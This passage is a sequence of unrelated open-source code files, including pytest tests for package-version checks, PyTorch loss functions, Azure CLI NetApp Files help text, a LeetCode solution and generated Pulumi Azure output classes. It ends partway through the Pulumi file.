[Package('spam', '3.2.1'), Package('eggs', '3.2.1.5')],
expected_pkgs,
),
(
[Package('ovs', '2.6'), Package('ovs', '2.4')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_precise_version_found(pkgs, expected_pkgs_dict):
aos_version._check_precise_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expect_not_found', [
(
[],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # none found
),
(
[Package('spam', '3.2.1')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # completely missing
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
{
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
}
}, # not the right version
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5')],
{
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
}
}, # eggs found with multiple versions
),
])
def test_check_precise_version_found_fail(pkgs, expect_not_found):
with pytest.raises(aos_version.PreciseVersionNotFound) as e:
aos_version._check_precise_version_found(pkgs, expected_pkgs)
assert list(expect_not_found.values()) == e.value.problem_pkgs
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
[],
expected_pkgs,
),
(
# more precise but not strictly higher
[Package('spam', '3.2.1.9')],
expected_pkgs,
),
(
[Package('ovs', '2.7')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
),
])
def test_check_higher_version_found(pkgs, expected_pkgs_dict):
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher', [
(
[Package('spam', '3.3')],
expected_pkgs,
['spam-3.3'], # lower precision, but higher
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
expected_pkgs,
['eggs-3.3.2'], # one too high
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
expected_pkgs,
['eggs-3.4'], # multiple versions, one is higher
),
(
[Package('eggs', '3.2.1'), Package('eggs', '3.4'), Package('eggs', '3.3')],
expected_pkgs,
['eggs-3.4'], # multiple versions, two are higher
),
(
[Package('ovs', '2.8')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
['ovs-2.8'],
),
])
def test_check_higher_version_found_fail(pkgs, expected_pkgs_dict, expect_higher):
with pytest.raises(aos_version.FoundHigherVersion) as e:
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
assert set(expect_higher) == set(e.value.problem_pkgs)
@pytest.mark.parametrize('pkgs', [
[],
[Package('spam', '3.2.1')],
[Package('spam', '3.2.1'), Package('eggs', '3.2.2')],
])
def test_check_multi_minor_release(pkgs):
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
@pytest.mark.parametrize('pkgs,expect_to_flag_pkgs', [
(
[Package('spam', '3.2.1'), Package('spam', '3.3.2')],
['spam'],
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
['eggs'],
),
])
def test_check_multi_minor_release_fail(pkgs, expect_to_flag_pkgs):
with pytest.raises(aos_version.FoundMultiRelease) as e:
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
assert set(expect_to_flag_pkgs) == set(e.value.problem_pkgs)
|
chrome/test/mini_installer/verifier_runner.py | kjthegod/chromium | 2,151 | 61555 |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import file_verifier
import process_verifier
import registry_verifier
class VerifierRunner:
"""Runs all Verifiers."""
def __init__(self):
"""Constructor."""
# TODO(sukolsak): Implement other verifiers
self._verifiers = {
'Files': file_verifier.FileVerifier(),
'Processes': process_verifier.ProcessVerifier(),
'RegistryEntries': registry_verifier.RegistryVerifier(),
}
def VerifyAll(self, property, variable_expander):
"""Verifies that the current machine states match the property dictionary.
A property dictionary is a dictionary where each key is a verifier's name
and the associated value is the input to that verifier. For details about
the input format for each verifier, take a look at http://goo.gl/1P85WL
Args:
property: A property dictionary.
variable_expander: A VariableExpander object.
"""
for verifier_name, verifier_input in property.iteritems():
if verifier_name not in self._verifiers:
raise KeyError('Unknown verifier %s' % verifier_name)
self._verifiers[verifier_name].VerifyInput(verifier_input,
variable_expander)
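# Illustrative usage sketch added for clarity (not part of the original module);
# the property dictionary and expander below are hypothetical:
#   runner = VerifierRunner()
#   runner.VerifyAll({'Files': {...}, 'Processes': {...}}, variable_expander)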
|
src/quicknlp/callbacks.py | jalajthanaki/quick-nlp | 287 | 61563 |
from fastai.sgdr import Callback
class CVAELossCallback(Callback):
pass
|
modules/functional/loss.py | Masterchef365/pvcnn | 477 | 61564 |
import torch
import torch.nn.functional as F
__all__ = ['kl_loss', 'huber_loss']
def kl_loss(x, y):
x = F.softmax(x.detach(), dim=1)
y = F.log_softmax(y, dim=1)
return torch.mean(torch.sum(x * (torch.log(x) - y), dim=1))
def huber_loss(error, delta):
abs_error = torch.abs(error)
quadratic = torch.min(abs_error, torch.full_like(abs_error, fill_value=delta))
losses = 0.5 * (quadratic ** 2) + delta * (abs_error - quadratic)
return torch.mean(losses)
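# Notes added for clarity (not part of the original module):
# kl_loss computes mean KL(p || q) over the batch, with p = softmax(x.detach()) as the
# (non-differentiated) target distribution and q given through log_softmax(y).
# huber_loss is the standard Huber form: 0.5 * error^2 for |error| <= delta and
# delta * (|error| - 0.5 * delta) beyond it.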
|
src/genie/libs/parser/iosxe/tests/ShowPlatformHardwareQfpStatisticsDrop/cli/equal/golden_output_active_expected.py | balmasea/genieparser | 204 | 61635 |
<reponame>balmasea/genieparser
expected_output = {
"global_drop_stats": {
"Ipv4NoAdj": {"octets": 296, "packets": 7},
"Ipv4NoRoute": {"octets": 7964, "packets": 181},
"PuntPerCausePolicerDrops": {"octets": 184230, "packets": 2003},
"UidbNotCfgd": {"octets": 29312827, "packets": 466391},
"UnconfiguredIpv4Fia": {"octets": 360, "packets": 6},
}
}
|
generator/transformers/common_producer.py | jordynmackool/sdl_java_suite | 138 | 61644 |
<reponame>jordynmackool/sdl_java_suite<gh_stars>100-1000
"""
Common transformation
"""
import logging
import re
from abc import ABC
from collections import namedtuple, OrderedDict
from model.array import Array
from model.enum import Enum
from model.struct import Struct
class InterfaceProducerCommon(ABC):
"""
Common transformation
"""
version = '1.0.0'
def __init__(self, container_name, enums_package, structs_package, package_name,
enum_names=(), struct_names=(), key_words=()):
self.logger = logging.getLogger('Generator.InterfaceProducerCommon')
self.container_name = container_name
self.enum_names = enum_names
self.struct_names = struct_names
self.key_words = key_words
self.enums_package = enums_package
self.structs_package = structs_package
self.package_name = package_name
self._params = namedtuple('params', 'deprecated description key last mandatory origin return_type since title '
'param_doc name')
@property
def get_version(self):
return self.version
@property
def params(self):
"""
:return: namedtuple params(name='', origin='')
"""
return self._params
@staticmethod
def key(param: str):
"""
Convert a param string to uppercase, inserting underscores
:param param: camel case string
:return: string in uppercase with underscores
"""
if re.match(r'^[A-Z_\d]+$', param):
return param
else:
result = re.sub(r'([a-z]|[A-Z]{2,})([A-Z]|\d$)', r'\1_\2', param).upper()
result = re.sub('IDPARAM', 'ID_PARAM', result)
return result
@staticmethod
def ending_cutter(n: str):
"""
If the string does not consist only of uppercase letters and ends with 'ID', delete 'ID' from the end of the string
:param n: string to evaluate
:return: if match cut string else original string
"""
if re.match(r'^\w+[a-z]+([A-Z]{2,})?ID$', n):
return n[:-2]
else:
return n
@staticmethod
def extract_description(d):
"""
Extract description
:param d: list with description
:return: evaluated string
"""
return re.sub(r'(\s{2,}|\n)', ' ', ''.join(d)).strip() if d else ''
@staticmethod
def extract_values(param):
p = OrderedDict()
if hasattr(param.param_type, 'min_size'):
p['array_min_size'] = param.param_type.min_size
if hasattr(param.param_type, 'max_size'):
p['array_max_size'] = param.param_type.max_size
if hasattr(param, 'default_value'):
if hasattr(param.default_value, 'name'):
p['default_value'] = param.default_value.name
else:
p['default_value'] = param.default_value
elif hasattr(param.param_type, 'default_value'):
if hasattr(param.param_type.default_value, 'name'):
p['default_value'] = param.param_type.default_value.name
else:
p['default_value'] = param.param_type.default_value
if hasattr(param.param_type, 'min_value'):
p['num_min_value'] = param.param_type.min_value
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'min_value'):
p['num_min_value'] = param.param_type.element_type.min_value
if hasattr(param.param_type, 'max_value'):
p['num_max_value'] = param.param_type.max_value
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'max_value'):
p['num_max_value'] = param.param_type.element_type.max_value
if hasattr(param.param_type, 'min_length'):
p['string_min_length'] = param.param_type.min_length
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'min_length'):
p['string_min_length'] = param.param_type.element_type.min_length
if hasattr(param.param_type, 'max_length'):
p['string_max_length'] = param.param_type.max_length
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'max_length'):
p['string_max_length'] = param.param_type.element_type.max_length
# Filter None values
filtered_values = {k: v for k, v in p.items() if v is not None}
return filtered_values
@staticmethod
def replace_sync(name):
"""
:param name: string with item name
:return: string with replaced 'sync' to 'Sdl'
"""
if name:
return re.sub(r'^([sS])ync(.+)$', r'\1dl\2', name)
return name
def replace_keywords(self, name: str = '') -> str:
"""
if :param name in self.key_words, :return: name += 'Param'
:param name: string with item name
"""
if any(map(lambda k: re.search(r'^(get|set|key_)?{}$'.format(name.casefold()), k), self.key_words)):
origin = name
if name.isupper():
name += '_PARAM'
else:
name += 'Param'
self.logger.debug('Replacing %s with %s', origin, name)
return self.replace_sync(name)
def extract_type(self, param):
"""
Evaluate and extract type
:param param: sub-element Param of element from initial Model
:return: string with sub-element type
"""
def evaluate(t1):
if isinstance(t1, Struct) or isinstance(t1, Enum):
name = t1.name
return name
else:
return type(t1).__name__
if isinstance(param.param_type, Array):
return 'List<{}>'.format(evaluate(param.param_type.element_type))
else:
return evaluate(param.param_type)
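# Illustrative behaviour sketch added for clarity (not part of the original module);
# the inputs are hypothetical examples of the transformations implemented above:
#   InterfaceProducerCommon.key('someParamName')           -> 'SOME_PARAM_NAME'
#   InterfaceProducerCommon.ending_cutter('appID')         -> 'app'
#   InterfaceProducerCommon.replace_sync('SyncMsgVersion') -> 'SdlMsgVersion'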
|
tests/sample7args.py | anki-code/python-hunter | 707 | 61645 |
from __future__ import print_function
def one(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # one
a = b = c['side'] = 'effect'
two()
def two(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # two
a = b = c['side'] = 'effect'
three()
def three(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # three
a = b = c['side'] = 'effect'
four()
def four(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # four
a = b = c['side'] = 'effect'
five()
def five(a=123, b='234', c={'3': [4, '5']}):
six()
six()
six()
a = b = c['side'] = in_five = 'effect'
for i in range(1): # five
return i # five
def six():
pass
if __name__ == "__main__":
from hunter import *
from utils import DebugCallPrinter
trace(
Backlog(stack=15, vars=True, action=DebugCallPrinter(' [' 'backlog' ']'), function='five').filter(~Q(function='six')),
action=DebugCallPrinter
)
one()
one() # make sure Backlog is reusable (doesn't have storage side-effects)
stop()
|
test/com/facebook/buck/cli/testdata/run-command/cmd/echo_var.py | Unknoob/buck | 8,027 | 61670 |
from __future__ import absolute_import, division, print_function, unicode_literals
import os
print("VAR is '{}'".format(os.environ["VAR"]))
|
src/chapter-4/test_ids.py | luizyao/pytest-chinese-doc | 283 | 61699 |
<gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
'''
Author: <NAME> (<EMAIL>)
Created Date: 2019-10-04 7:05:16
-----
Last Modified: 2019-10-04 7:29:59
Modified By: <NAME> (<EMAIL>)
-----
THIS PROGRAM IS FREE SOFTWARE, IS LICENSED UNDER MIT.
A short and simple permissive license with conditions
only requiring preservation of copyright and license notices.
Copyright © 2019 <NAME>
-----
HISTORY:
Date By Comments
---------- -------- ---------------------------------------------------------
'''
import pytest
@pytest.fixture(params=[0, 1], ids=['spam', 'ham'])
def a(request):
return request.param
def test_a(a):
pass
def idfn(fixture_value):
if fixture_value == 0:
return "eggs"
elif fixture_value == 1:
return False
elif fixture_value == 2:
return None
else:
return fixture_value
@pytest.fixture(params=[0, 1, 2, 3], ids=idfn)
def b(request):
return request.param
def test_b(b):
pass
class C:
pass
@pytest.fixture(params=[(1, 2), {'d': 1}, C()])
def c(request):
return request.param
def test_c(c):
pass
|
src/netappfiles-preview/azext_netappfiles_preview/_help.py | Mannan2812/azure-cli-extensions | 207 | 61751 |
<filename>src/netappfiles-preview/azext_netappfiles_preview/_help.py
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.help_files import helps
# pylint: disable=line-too-long
helps['netappfiles'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Resources.
"""
# account
helps['netappfiles account'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Account Resources.
"""
helps['netappfiles account create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update).
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the account
examples:
- name: Create an ANF account
text: >
az netappfiles account create -g group --account-name name -l location
"""
helps['netappfiles account set'] = """
type: command
short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty [].
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the account
- name: --active-directories
type: string
short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory)
examples:
- name: Update the tags and active directory of an ANF account
text: >
az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2
- name: Remove the active directory from the ANF account
text: >
az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2
"""
helps['netappfiles account update'] = """
type: command
short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the account
- name: --active-directories
type: string
short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory)
examples:
- name: Update the tags and active directory of an ANF account
text: >
az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2
"""
helps['netappfiles account delete'] = """
type: command
short-summary: Delete the specified ANF account.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
examples:
- name: Delete an ANF account
text: >
az netappfiles account delete -g group --account-name name
"""
helps['netappfiles account list'] = """
type: command
short-summary: List ANF accounts.
examples:
- name: List ANF accounts within a resource group
text: >
az netappfiles account list -g group
"""
helps['netappfiles account show'] = """
type: command
short-summary: Get the specified ANF account.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
examples:
- name: Get an ANF account
text: >
az netappfiles account show -g group --account-name name
"""
# pools
helps['netappfiles pool'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Pool Resources.
"""
helps['netappfiles pool create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
- name: --size
type: integer
short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes
- name: --service-level
type: string
short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"]
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the pool
examples:
- name: Create an ANF pool
text: >
az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium"
"""
helps['netappfiles pool update'] = """
type: command
short-summary: Update the tags of the specified ANF pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
- name: --size
type: integer
short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes
- name: --service-level
type: string
short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"]
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the pool
examples:
- name: Update specific values for an ANF pool
text: >
az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]'
"""
helps['netappfiles pool delete'] = """
type: command
short-summary: Delete the specified ANF pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
examples:
- name: Delete an ANF pool
text: >
az netappfiles pool delete -g group --account-name aname --pool-name pname
"""
helps['netappfiles pool list'] = """
type: command
short-summary: List the ANF pools for the specified account.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
examples:
- name: List the pools for the ANF account
text: >
az netappfiles pool list -g group --account-name name
"""
helps['netappfiles pool show'] = """
type: command
short-summary: Get the specified ANF pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
examples:
- name: Get an ANF pool
text: >
az netappfiles pool show -g group --account-name aname --pool-name pname
"""
# volumes
helps['netappfiles volume'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Volume Resources.
"""
helps['netappfiles volume create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
- name: --service-level
type: string
short-summary: The service level ["Standard"|"Premium"|"Extreme"]
- name: --usage-threshold
type: int
short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100 TiB
- name: --creation-token
type: string
short-summary: A unique file path identifier, from 1 to 80 characters
- name: --subnet-id
type: string
short-summary: The subnet identifier
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the volume
- name: --export-policy
type: string
short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names)
examples:
- name: Create an ANF volume
text: >
az netappfiles volume create -g group --account-name aname --pool-name pname --volume-name vname -l location --service-level "Premium" --usage-threshold 107374182400 --creation-token "<PASSWORD>" --subnet-id "/subscriptions/mysubsid/resourceGroups/myrg/providers/Microsoft.Network/virtualNetworks/myvnet/subnets/default" --export-policy '[{"allowed_clients":"0.0.0.0/0", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv4": "false"}]'
"""
helps['netappfiles volume update'] = """
type: command
short-summary: Update the specified ANF volume with the values provided. Unspecified values will remain unchanged.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
- name: --service-level
type: string
short-summary: The service level ["Standard"|"Premium"|"Extreme"]
- name: --usage-threshold
type: int
short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100 TiB
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the volume
- name: --export-policy
type: string
short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names)
examples:
- name: Update an ANF volume
text: >
az netappfiles volume update -g group --account-name aname --pool-name pname --volume-name vname --service-level level --usage-threshold 107374182400 --tags 'key[=value] key[=value]' --export-policy '[{"allowed_clients":"1.2.3.0/24", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv4": "false"}, {"allowed_clients":"1.2.4.0/24", "rule_index": "2", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv4": "false"}]'
"""
helps['netappfiles volume delete'] = """
type: command
short-summary: Delete the specified ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
examples:
- name: Delete an ANF volume
text: >
az netappfiles volume delete -g group --account-name aname --pool-name pname --volume-name vname
"""
helps['netappfiles volume list'] = """
type: command
short-summary: List the ANF volumes for the specified account and pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
examples:
- name: List the ANF volumes of the pool
text: >
az netappfiles volume list -g group --account-name aname --pool-name pname
"""
helps['netappfiles volume show'] = """
type: command
short-summary: Get the specified ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
examples:
- name: Returns the properties of the given ANF volume
text: >
az netappfiles volume show -g group --account-name aname --pool-name pname --volume-name vname
"""
# mounttargets
helps['netappfiles mount-target'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Mount Target Resources.
"""
helps['netappfiles mount-target list'] = """
type: command
short-summary: List the mount targets of an ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
examples:
- name: List the mount targets of an ANF volume
text: >
az netappfiles mount-target list -g group --account-name aname --pool-name pname --volume-name vname
"""
# snapshots
helps['netappfiles snapshot'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Snapshot Resources.
"""
helps['netappfiles snapshot create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) snapshot.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
- name: --snapshot-name -n -s
type: string
short-summary: The name of the ANF snapshot
- name: --file-system-id
type: string
short-summary: The uuid of the volume
examples:
- name: Create an ANF snapshot
text: >
az netappfiles snapshot create -g group --account-name account-name --pool-name pname --volume-name vname --snapshot-name sname -l location --file-system-id volume-uuid
"""
helps['netappfiles snapshot delete'] = """
type: command
short-summary: Delete the specified ANF snapshot.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
- name: --snapshot-name -n -s
type: string
short-summary: The name of the ANF snapshot
examples:
- name: Delete an ANF snapshot
text: >
az netappfiles snapshot delete -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname
"""
helps['netappfiles snapshot list'] = """
type: command
short-summary: List the snapshots of an ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
examples:
- name: list the snapshots of an ANF volume
text: >
az netappfiles snapshot list -g group --account-name aname --pool-name pname --volume-name vname
"""
helps['netappfiles snapshot show'] = """
type: command
short-summary: Get the specified ANF snapshot.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
- name: --snapshot-name -n -s
type: string
short-summary: The name of the ANF snapshot
examples:
- name: Return the specified ANF snapshot
text: >
az netappfiles snapshot show -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname
"""
|
coding_interviews/leetcode/easy/lucky_numbers_in_a_matrix/lucky_numbers_in_a_matrix.py
|
LeandroTk/Algorithms
| 205 |
61779
|
<gh_stars>100-1000
# https://leetcode.com/problems/lucky-numbers-in-a-matrix
def lucky_numbers(matrix):
all_lucky_numbers, all_mins = [], []
for row in matrix:
found_min, col_index = float('Inf'), -1
for index, column in enumerate(row):
if column < found_min:
found_min = column
col_index = index
all_mins.append([found_min, col_index])
for a_min in all_mins:
[min_value, min_column] = a_min
maximum = float('-Inf')
for index in range(len(matrix)):
num = matrix[index][min_column]
maximum = max(num, maximum)
if maximum == min_value:
all_lucky_numbers.append(min_value)
return all_lucky_numbers
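# Sanity check (illustrative example, matrix values assumed): for
# [[3, 7, 8], [9, 11, 13], [15, 16, 17]] the row minima are 3, 9 and 15, all in
# column 0; only 15 is also the maximum of that column, so
# lucky_numbers([[3, 7, 8], [9, 11, 13], [15, 16, 17]]) returns [15].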
|
sdk/python/pulumi_azure/domainservices/outputs.py
|
henriktao/pulumi-azure
| 109 |
61800
|
<gh_stars>100-1000
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ServiceInitialReplicaSet',
'ServiceNotifications',
'ServiceSecureLdap',
'ServiceSecurity',
'GetServiceNotificationResult',
'GetServiceReplicaSetResult',
'GetServiceSecureLdapResult',
'GetServiceSecurityResult',
]
@pulumi.output_type
class ServiceInitialReplicaSet(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "subnetId":
suggest = "subnet_id"
elif key == "domainControllerIpAddresses":
suggest = "domain_controller_ip_addresses"
elif key == "externalAccessIpAddress":
suggest = "external_access_ip_address"
elif key == "serviceStatus":
suggest = "service_status"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceInitialReplicaSet. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceInitialReplicaSet.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceInitialReplicaSet.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
subnet_id: str,
domain_controller_ip_addresses: Optional[Sequence[str]] = None,
external_access_ip_address: Optional[str] = None,
id: Optional[str] = None,
location: Optional[str] = None,
service_status: Optional[str] = None):
"""
:param str subnet_id: The ID of the subnet in which to place the initial replica set.
:param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the initial replica set, typically two.
:param str external_access_ip_address: The publicly routable IP address for the domain controllers in the initial replica set.
:param str id: The ID of the Domain Service.
:param str location: The Azure location where the Domain Service exists. Changing this forces a new resource to be created.
:param str service_status: The current service status for the initial replica set.
"""
pulumi.set(__self__, "subnet_id", subnet_id)
if domain_controller_ip_addresses is not None:
pulumi.set(__self__, "domain_controller_ip_addresses", domain_controller_ip_addresses)
if external_access_ip_address is not None:
pulumi.set(__self__, "external_access_ip_address", external_access_ip_address)
if id is not None:
pulumi.set(__self__, "id", id)
if location is not None:
pulumi.set(__self__, "location", location)
if service_status is not None:
pulumi.set(__self__, "service_status", service_status)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
The ID of the subnet in which to place the initial replica set.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="domainControllerIpAddresses")
def domain_controller_ip_addresses(self) -> Optional[Sequence[str]]:
"""
A list of subnet IP addresses for the domain controllers in the initial replica set, typically two.
"""
return pulumi.get(self, "domain_controller_ip_addresses")
@property
@pulumi.getter(name="externalAccessIpAddress")
def external_access_ip_address(self) -> Optional[str]:
"""
The publicly routable IP address for the domain controllers in the initial replica set.
"""
return pulumi.get(self, "external_access_ip_address")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
The ID of the Domain Service.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The Azure location where the Domain Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="serviceStatus")
def service_status(self) -> Optional[str]:
"""
The current service status for the initial replica set.
"""
return pulumi.get(self, "service_status")
@pulumi.output_type
class ServiceNotifications(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "additionalRecipients":
